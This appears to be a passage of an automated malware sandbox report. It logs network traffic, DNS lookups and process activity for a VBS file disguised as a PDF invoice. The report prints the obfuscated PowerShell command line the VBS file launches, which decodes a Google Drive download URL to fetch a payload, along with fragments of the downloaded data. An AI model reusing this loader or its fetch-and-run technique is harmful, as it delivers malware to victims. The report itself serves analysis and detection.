            Sep 30, 2024 09:59:11.629494905 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629519939 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629524946 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629529953 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629564047 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629566908 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629571915 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629607916 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629631042 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629632950 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629638910 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629672050 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629677057 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629702091 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629718065 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629722118 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629750967 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629765987 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629770994 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629795074 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629817009 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629822016 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629844904 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629867077 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629872084 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629898071 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629918098 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629921913 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629947901 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629966974 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629971981 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.630002022 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.630009890 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.630014896 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.630040884 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.630062103 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.630064964 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.630073071 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.630116940 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.630121946 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.630126953 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.630163908 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.630167961 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.630206108 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.630209923 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.630265951 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.630326986 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.638561010 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.638587952 CEST44349705216.58.206.65192.168.2.10

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Sep 30, 2024 09:59:06.157962084 CEST5967953192.168.2.101.1.1.1
            Sep 30, 2024 09:59:06.272408009 CEST53596791.1.1.1192.168.2.10
            Sep 30, 2024 09:59:07.403326035 CEST5408353192.168.2.101.1.1.1
            Sep 30, 2024 09:59:07.410044909 CEST53540831.1.1.1192.168.2.10
            Sep 30, 2024 09:59:20.792637110 CEST53561571.1.1.1192.168.2.10
            Sep 30, 2024 09:59:23.276977062 CEST53647181.1.1.1192.168.2.10

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Sep 30, 2024 09:59:06.157962084 CEST192.168.2.101.1.1.10x1cbaStandard query (0)drive.google.comA (IP address)IN (0x0001)false
            Sep 30, 2024 09:59:07.403326035 CEST192.168.2.101.1.1.10xc620Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Sep 30, 2024 09:59:06.272408009 CEST1.1.1.1192.168.2.100x1cbaNo error (0)drive.google.com142.250.185.206A (IP address)IN (0x0001)false
            Sep 30, 2024 09:59:07.410044909 CEST1.1.1.1192.168.2.100xc620No error (0)drive.usercontent.google.com216.58.206.65A (IP address)IN (0x0001)false

            HTTP Request Dependency Graph

            • drive.google.com
            • drive.usercontent.google.com

            HTTPS Proxied Packets

            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.1049704142.250.185.2064437432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            TimestampBytes transferredDirectionData
            2024-09-30 07:59:06 UTC215OUTGET /uc?export=download&id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaW HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: drive.google.com
            Connection: Keep-Alive
            2024-09-30 07:59:07 UTC1610INHTTP/1.1 303 See Other
            Content-Type: application/binary
            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
            Pragma: no-cache
            Expires: Mon, 01 Jan 1990 00:00:00 GMT
            Date: Mon, 30 Sep 2024 07:59:07 GMT
            Location: https://drive.usercontent.google.com/download?id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaW&export=download
            Strict-Transport-Security: max-age=31536000
            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
            Cross-Origin-Opener-Policy: same-origin
            Content-Security-Policy: script-src 'nonce-tRT13k_qHQyTGFmGbAFcsQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
            Server: ESF
            Content-Length: 0
            X-XSS-Protection: 0
            X-Frame-Options: SAMEORIGIN
            X-Content-Type-Options: nosniff
            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
            Connection: close


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.1049705216.58.206.654437432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            TimestampBytes transferredDirectionData
            2024-09-30 07:59:08 UTC233OUTGET /download?id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaW&export=download HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: drive.usercontent.google.com
            Connection: Keep-Alive
            2024-09-30 07:59:10 UTC4854INHTTP/1.1 200 OK
            Content-Type: application/octet-stream
            Content-Security-Policy: sandbox
            Content-Security-Policy: default-src 'none'
            Content-Security-Policy: frame-ancestors 'none'
            X-Content-Security-Policy: sandbox
            Cross-Origin-Opener-Policy: same-origin
            Cross-Origin-Embedder-Policy: require-corp
            Cross-Origin-Resource-Policy: same-site
            X-Content-Type-Options: nosniff
            Content-Disposition: attachment; filename="Enstranged.pfb"
            Access-Control-Allow-Origin: *
            Access-Control-Allow-Credentials: false
            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
            Accept-Ranges: bytes
            Content-Length: 472460
            Last-Modified: Sun, 29 Sep 2024 19:01:31 GMT
            X-GUploader-UploadID: AD-8ljvYxJBCSgBHrhIeHmZ3dZb9nJImE3x7bZrkyEIQ-FeyBPoA2Wz2YyinF2r12ts8sh9y5s_Lw2AdSQ
            Date: Mon, 30 Sep 2024 07:59:10 GMT
            Expires: Mon, 30 Sep 2024 07:59:10 GMT
            Cache-Control: private, max-age=0
            X-Goog-Hash: crc32c=+VWg4Q==
            Server: UploadServer
            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
            Connection: close
            2024-09-30 07:59:10 UTC4854INData Raw: 63 51 47 62 63 51 47 62 75 32 34 54 47 51 44 72 41 76 77 76 63 51 47 62 41 31 77 6b 42 4f 73 43 58 36 6c 78 41 5a 75 35 4e 67 4d 55 66 65 73 43 46 64 39 78 41 5a 75 42 38 61 4c 72 4e 46 48 72 41 6d 36 6a 36 77 49 43 67 59 48 78 6c 4f 67 67 4c 48 45 42 6d 2b 73 43 79 54 44 72 41 6f 74 59 63 51 47 62 75 67 59 55 79 49 58 72 41 74 72 34 63 51 47 62 63 51 47 62 36 77 49 31 4a 44 48 4b 36 77 4c 54 32 6e 45 42 6d 34 6b 55 43 2b 73 43 54 54 42 78 41 5a 76 52 34 6e 45 42 6d 33 45 42 6d 34 50 42 42 48 45 42 6d 2b 73 43 63 50 75 42 2b 56 4a 2f 2f 77 46 38 7a 4f 73 43 47 45 5a 78 41 5a 75 4c 52 43 51 45 36 77 4c 55 38 58 45 42 6d 34 6e 44 36 77 4b 2f 57 65 73 43 2b 2b 75 42 77 34 32 63 4f 51 42 78 41 5a 76 72 41 76 67 51 75 67 6c 71 41 38 58 72 41 71 37 46 36 77 4c
            Data Ascii: cQGbcQGbu24TGQDrAvwvcQGbA1wkBOsCX6lxAZu5NgMUfesCFd9xAZuB8aLrNFHrAm6j6wICgYHxlOggLHEBm+sCyTDrAotYcQGbugYUyIXrAtr4cQGbcQGb6wI1JDHK6wLT2nEBm4kUC+sCTTBxAZvR4nEBm3EBm4PBBHEBm+sCcPuB+VJ//wF8zOsCGEZxAZuLRCQE6wLU8XEBm4nD6wK/WesC++uBw42cOQBxAZvrAvgQuglqA8XrAq7F6wL
            2024-09-30 07:59:10 UTC4854INData Raw: 32 72 30 31 37 4e 51 6e 37 4b 59 73 6b 46 66 46 4a 32 6a 6b 49 65 61 64 6b 33 41 67 32 44 76 70 65 48 73 4e 46 72 6e 6c 38 33 50 38 4c 59 35 50 56 50 6f 63 56 4b 36 7a 4e 63 31 4c 74 42 6d 72 76 6f 30 6f 4c 49 7a 43 4b 61 61 75 70 35 53 37 6b 36 4a 41 51 44 58 79 33 36 78 50 43 76 62 6d 71 4d 41 46 58 51 72 59 39 72 46 72 68 4f 72 33 62 63 41 46 57 2f 76 49 37 62 78 64 63 49 58 4a 5a 52 48 44 74 46 4e 4a 2b 34 58 71 79 55 6a 7a 39 54 61 69 4a 39 7a 51 38 61 75 4a 77 62 44 50 50 4e 38 39 79 41 32 79 49 36 54 63 41 67 50 2f 78 43 63 42 61 2b 38 2f 4c 34 62 68 4d 64 67 2b 38 74 32 30 6f 53 67 64 73 37 54 68 41 41 54 42 5a 30 41 5a 64 62 6a 78 59 73 4c 72 73 6b 36 4e 53 77 4e 35 30 70 77 6b 5a 5a 56 64 4e 6c 6c 4b 69 65 45 2b 57 66 37 46 30 6a 67 42 45 78 70
            Data Ascii: 2r017NQn7KYskFfFJ2jkIeadk3Ag2DvpeHsNFrnl83P8LY5PVPocVK6zNc1LtBmrvo0oLIzCKaaup5S7k6JAQDXy36xPCvbmqMAFXQrY9rFrhOr3bcAFW/vI7bxdcIXJZRHDtFNJ+4XqyUjz9TaiJ9zQ8auJwbDPPN89yA2yI6TcAgP/xCcBa+8/L4bhMdg+8t20oSgds7ThAATBZ0AZdbjxYsLrsk6NSwN50pwkZZVdNllKieE+Wf7F0jgBExp
            2024-09-30 07:59:10 UTC135INData Raw: 65 37 72 44 70 42 30 64 4e 33 46 4b 6c 79 50 78 63 6e 66 49 6b 39 6a 78 64 63 64 77 68 59 70 74 47 71 70 52 47 56 6d 77 49 46 4f 67 4e 43 36 2f 72 2b 76 4e 52 36 2b 58 49 56 4a 46 59 33 46 6e 57 6d 43 56 58 69 52 62 59 32 77 6d 56 63 78 6e 7a 6b 72 67 46 37 49 7a 35 4c 70 35 68 72 36 4b 66 6f 6a 36 39 42 32 45 67 34 73 48 33 4f 34 63 7a 73 61 38 6c 30 74 4e 73 32 34 4c 6e 57 39 6b 77 6b 4f 58 71 4c 34
            Data Ascii: e7rDpB0dN3FKlyPxcnfIk9jxdcdwhYptGqpRGVmwIFOgNC6/r+vNR6+XIVJFY3FnWmCVXiRbY2wmVcxnzkrgF7Iz5Lp5hr6Kfoj69B2Eg4sH3O4czsa8l0tNs24LnW9kwkOXqL4
            2024-09-30 07:59:10 UTC1324INData Raw: 63 56 6e 2f 43 51 43 38 74 47 61 65 58 78 75 31 6a 4a 61 48 32 58 37 59 34 36 70 52 44 65 42 73 35 72 78 7a 4c 4d 4a 50 6a 76 76 74 32 75 76 62 43 75 33 37 43 67 56 6e 57 61 4e 64 55 34 71 69 56 30 35 35 54 46 50 55 64 39 6d 73 75 4a 4e 57 57 52 71 57 70 61 44 49 46 51 55 78 30 41 6e 68 77 2f 34 43 43 33 54 73 64 66 2f 35 70 48 55 69 7a 32 73 2b 30 4e 50 36 57 53 34 46 57 62 49 71 46 76 73 62 79 35 53 73 59 54 41 42 58 4c 39 38 4c 53 42 61 36 37 4f 31 47 56 51 42 50 52 64 52 47 31 68 61 4b 62 49 70 37 30 39 63 69 48 71 32 49 73 41 70 79 58 38 75 30 33 2b 36 2b 2f 73 6e 34 4a 7a 71 73 30 63 70 5a 4f 51 59 30 49 5a 58 71 4c 57 35 6a 6d 4a 71 74 53 4b 6c 36 4f 30 66 76 58 6d 44 70 46 64 50 37 68 45 4d 68 72 34 6a 66 50 6d 6a 4e 32 44 58 51 54 77 67 37 2b 30
            Data Ascii: cVn/CQC8tGaeXxu1jJaH2X7Y46pRDeBs5rxzLMJPjvvt2uvbCu37CgVnWaNdU4qiV055TFPUd9msuJNWWRqWpaDIFQUx0Anhw/4CC3Tsdf/5pHUiz2s+0NP6WS4FWbIqFvsby5SsYTABXL98LSBa67O1GVQBPRdRG1haKbIp709ciHq2IsApyX8u03+6+/sn4Jzqs0cpZOQY0IZXqLW5jmJqtSKl6O0fvXmDpFdP7hEMhr4jfPmjN2DXQTwg7+0
            2024-09-30 07:59:10 UTC1390INData Raw: 2b 65 2b 66 50 4c 46 6a 70 50 69 57 6b 79 66 43 68 50 4c 44 59 61 33 51 64 50 30 5a 56 71 6b 55 2f 59 5a 49 64 63 6a 33 4b 62 2b 4f 57 5a 75 38 33 71 54 4e 55 4d 71 37 73 55 4e 57 4e 72 52 6b 54 34 79 46 70 67 35 79 45 37 7a 78 38 67 51 42 75 4e 69 6a 4a 42 77 38 7a 51 4e 52 69 41 34 6d 77 32 65 6a 32 51 38 38 51 33 2b 6b 6f 6f 46 76 4c 46 4d 70 32 71 67 39 6a 55 44 39 67 33 38 7a 6c 73 38 70 32 4a 52 6e 34 75 6a 39 67 75 77 45 4c 32 68 30 64 4e 33 46 4b 76 79 50 78 7a 6b 44 45 6e 59 56 76 36 6d 6a 74 39 46 61 71 64 52 37 37 6f 35 62 78 63 37 69 69 32 7a 52 2b 52 4f 49 6f 59 75 42 47 30 59 5a 4f 4f 6b 70 75 55 58 74 56 45 48 57 35 51 4d 6c 79 51 75 48 48 75 49 35 35 70 30 75 42 76 70 64 4c 67 62 36 58 53 34 47 2b 6c 30 75 42 76 70 64 4c 67 62 36 58 53 34
            Data Ascii: +e+fPLFjpPiWkyfChPLDYa3QdP0ZVqkU/YZIdcj3Kb+OWZu83qTNUMq7sUNWNrRkT4yFpg5yE7zx8gQBuNijJBw8zQNRiA4mw2ej2Q88Q3+kooFvLFMp2qg9jUD9g38zls8p2JRn4uj9guwEL2h0dN3FKvyPxzkDEnYVv6mjt9FaqdR77o5bxc7ii2zR+ROIoYuBG0YZOOkpuUXtVEHW5QMlyQuHHuI55p0uBvpdLgb6XS4G+l0uBvpdLgb6XS4
            2024-09-30 07:59:11 UTC1390INData Raw: 77 4d 33 38 41 30 58 37 71 73 75 77 6a 68 75 63 73 57 7a 46 5a 73 79 64 5a 32 37 6a 64 51 57 44 4b 55 51 5a 67 51 77 63 77 53 4e 78 70 49 6b 61 4f 6f 76 64 78 33 5a 4e 51 70 6a 67 4c 36 58 48 54 39 41 71 56 71 4a 50 32 48 4c 54 64 4c 37 79 6d 39 53 67 4e 5a 31 50 32 47 42 53 44 30 36 79 6b 63 72 32 39 61 38 4e 34 6d 78 66 6f 43 39 76 30 31 49 58 6c 5a 4a 74 78 34 58 72 30 35 63 6e 51 7a 76 37 33 46 68 33 66 6c 6a 6e 46 34 76 36 4c 6a 45 65 75 63 6e 67 66 55 47 63 7a 34 31 36 69 46 71 61 76 4b 4d 6d 51 33 76 33 7a 66 50 54 6f 36 2b 68 37 6d 42 76 70 64 4c 67 62 36 58 53 34 47 2b 6c 30 75 42 76 70 64 4c 67 62 36 58 53 34 47 2b 6c 30 75 42 76 70 64 4c 67 55 34 7a 31 43 69 57 6f 75 47 54 6d 74 61 75 78 6c 70 51 43 49 32 38 6c 30 75 42 37 69 39 4b 7a 33 49 69
            Data Ascii: wM38A0X7qsuwjhucsWzFZsydZ27jdQWDKUQZgQwcwSNxpIkaOovdx3ZNQpjgL6XHT9AqVqJP2HLTdL7ym9SgNZ1P2GBSD06ykcr29a8N4mxfoC9v01IXlZJtx4Xr05cnQzv73Fh3fljnF4v6LjEeucngfUGcz416iFqavKMmQ3v3zfPTo6+h7mBvpdLgb6XS4G+l0uBvpdLgb6XS4G+l0uBvpdLgU4z1CiWouGTmtauxlpQCI28l0uB7i9Kz3Ii
            2024-09-30 07:59:11 UTC1390INData Raw: 65 53 68 77 37 51 44 47 72 31 79 52 5a 6b 67 51 77 67 65 4a 4d 52 62 75 75 78 68 47 68 35 2f 68 68 43 2f 4c 73 61 32 4f 51 6d 54 45 52 34 31 53 33 6e 58 4a 55 58 59 41 59 4f 65 50 43 4d 30 2b 70 4d 4c 6c 52 7a 68 6b 37 2b 44 35 61 6a 6a 31 74 52 6f 34 77 68 50 32 46 76 73 30 54 41 48 33 51 45 48 77 4c 78 2f 4e 33 39 55 53 5a 68 4d 7a 45 57 62 6d 4c 72 44 66 53 76 61 4a 6e 62 4c 34 79 54 67 42 4d 33 68 6a 58 49 68 36 74 67 4c 67 4b 63 30 6a 4f 73 7a 32 41 7a 78 78 71 35 6e 45 43 34 63 76 34 46 51 6b 47 49 6f 75 4f 65 62 74 69 6b 4b 79 33 47 52 6f 76 33 7a 31 6c 66 4e 31 69 57 42 35 2b 70 59 71 55 64 44 6a 2b 35 34 64 64 46 58 64 35 66 52 50 58 41 4e 68 73 30 65 41 57 70 53 6d 6a 50 68 63 41 65 4d 36 38 32 55 44 46 31 77 68 63 6c 6e 6b 63 32 4b 36 49 39 71
            Data Ascii: eShw7QDGr1yRZkgQwgeJMRbuuxhGh5/hhC/Lsa2OQmTER41S3nXJUXYAYOePCM0+pMLlRzhk7+D5ajj1tRo4whP2Fvs0TAH3QEHwLx/N39USZhMzEWbmLrDfSvaJnbL4yTgBM3hjXIh6tgLgKc0jOsz2Azxxq5nEC4cv4FQkGIouOebtikKy3GRov3z1lfN1iWB5+pYqUdDj+54ddFXd5fRPXANhs0eAWpSmjPhcAeM682UDF1whclnkc2K6I9q
            2024-09-30 07:59:11 UTC1390INData Raw: 64 69 59 6a 4c 4b 2b 6c 30 75 42 76 70 64 4c 67 62 36 58 53 34 47 2b 6c 30 75 42 76 70 64 4c 67 62 36 58 53 34 47 2b 6c 30 75 42 76 6e 69 4e 68 33 69 5a 65 71 76 33 6c 66 42 51 31 36 66 45 2b 37 45 63 78 67 57 2b 6c 30 73 37 4c 68 72 61 58 62 47 58 6c 55 71 2b 6c 30 75 42 76 70 64 4c 67 62 36 58 53 34 47 2b 6c 30 75 42 76 70 64 4c 67 62 36 58 53 34 47 2b 6c 30 75 42 76 6d 39 54 57 57 41 38 6f 38 72 44 6b 30 76 51 42 31 35 34 6a 77 30 57 75 72 6d 67 75 44 34 41 66 78 38 41 4a 61 6f 57 75 6a 35 6c 55 70 45 49 76 78 6d 4d 51 79 34 6d 46 6b 34 32 62 54 47 65 4d 59 6d 48 30 57 41 7a 34 47 69 51 33 57 65 73 78 63 7a 7a 32 47 48 72 73 47 31 50 69 63 2f 74 43 65 45 48 71 6f 51 4c 74 4d 52 2f 77 52 4a 6f 55 70 4a 4c 67 65 58 78 52 45 61 4e 6c 30 75 42 76 70 64 4c
            Data Ascii: diYjLK+l0uBvpdLgb6XS4G+l0uBvpdLgb6XS4G+l0uBvniNh3iZeqv3lfBQ16fE+7EcxgW+l0s7LhraXbGXlUq+l0uBvpdLgb6XS4G+l0uBvpdLgb6XS4G+l0uBvm9TWWA8o8rDk0vQB154jw0WurmguD4Afx8AJaoWuj5lUpEIvxmMQy4mFk42bTGeMYmH0WAz4GiQ3Wesxczz2GHrsG1Pic/tCeEHqoQLtMR/wRJoUpJLgeXxREaNl0uBvpdL
            2024-09-30 07:59:11 UTC1390INData Raw: 62 36 30 6e 4c 43 47 6d 74 6e 2f 76 56 35 61 4b 68 62 65 50 6c 52 49 43 67 46 6b 75 42 76 70 64 4c 67 62 36 58 53 34 47 2b 6c 30 75 42 76 70 64 4c 67 62 36 58 53 34 47 2b 6c 30 75 42 76 70 64 4c 62 77 49 50 6b 2b 2b 6e 75 38 4a 6e 4e 36 58 62 51 4d 68 6f 75 49 35 35 70 6b 75 42 76 70 64 4c 67 62 36 58 53 34 47 2b 6c 30 75 42 76 70 64 4c 67 62 36 58 53 34 47 2b 6c 30 75 42 76 70 64 4c 64 34 48 4b 67 61 61 5a 6e 6b 35 5a 56 63 58 61 30 67 57 47 48 38 64 31 46 6f 69 38 36 65 46 34 41 45 30 67 50 49 6e 7a 46 71 44 33 51 79 54 34 43 4c 33 57 68 73 75 39 69 37 4a 37 65 64 58 6f 53 4e 74 68 52 5a 75 6d 6c 58 61 65 56 78 6b 73 33 36 79 53 35 51 72 75 5a 46 50 4a 54 72 6f 59 41 68 2b 4e 53 71 61 53 6c 6e 64 36 4c 63 77 62 31 77 44 72 37 73 30 78 46 71 57 39 78 59
            Data Ascii: b60nLCGmtn/vV5aKhbePlRICgFkuBvpdLgb6XS4G+l0uBvpdLgb6XS4G+l0uBvpdLbwIPk++nu8JnN6XbQMhouI55pkuBvpdLgb6XS4G+l0uBvpdLgb6XS4G+l0uBvpdLd4HKgaaZnk5ZVcXa0gWGH8d1Foi86eF4AE0gPInzFqD3QyT4CL3Whsu9i7J7edXoSNthRZumlXaeVxks36yS5QruZFPJTroYAh+NSqaSlnd6Lcwb1wDr7s0xFqW9xY
            2024-09-30 07:59:11 UTC1390INData Raw: 68 61 39 64 43 66 35 65 67 42 51 6d 74 35 39 63 78 61 39 53 30 56 78 6b 4e 45 69 48 71 75 49 6a 67 70 7a 55 38 75 33 75 43 4e 6c 58 44 64 47 6b 68 76 71 6a 65 56 76 79 6d 68 53 64 61 68 41 65 4e 68 72 33 4d 65 66 53 34 7a 74 66 6e 73 72 5a 32 4b 47 55 34 34 6e 52 63 2b 77 4f 4d 71 38 59 44 6d 35 31 65 59 54 70 64 38 33 78 30 2f 57 41 59 34 6c 64 69 55 57 76 48 51 38 41 48 4d 41 55 58 75 67 34 52 33 46 31 77 68 63 6e 6e 45 63 4f 6b 55 77 68 58 43 4a 35 31 48 6f 78 76 4a 4b 46 44 57 74 57 37 45 36 4f 68 74 75 58 51 36 44 36 4b 2b 38 56 50 65 61 70 69 33 70 7a 72 52 34 4b 30 6e 63 4a 70 38 54 70 39 73 2b 61 32 76 65 36 43 6e 65 2f 64 2b 6b 79 6d 39 67 44 49 7a 53 50 33 6c 71 55 43 64 49 77 6f 2b 39 62 76 6e 55 6a 69 75 75 6e 39 2f 52 32 67 68 54 74 78 4e 6d
            Data Ascii: ha9dCf5egBQmt59cxa9S0VxkNEiHquIjgpzU8u3uCNlXDdGkhvqjeVvymhSdahAeNhr3MefS4ztfnsrZ2KGU44nRc+wOMq8YDm51eYTpd83x0/WAY4ldiUWvHQ8AHMAUXug4R3F1whcnnEcOkUwhXCJ51HoxvJKFDWtW7E6OhtuXQ6D6K+8VPeapi3pzrR4K0ncJp8Tp9s+a2ve6Cne/d+kym9gDIzSP3lqUCdIwo+9bvnUjiuun9/R2ghTtxNm


            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:3
            Start time:03:58:59
            Start date:30/09/2024
            Path:C:\Windows\System32\wscript.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs"
            Imagebase:0x7ff79f990000
            File size:170'496 bytes
            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:8
            Start time:03:59:02
            Start date:30/09/2024
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint 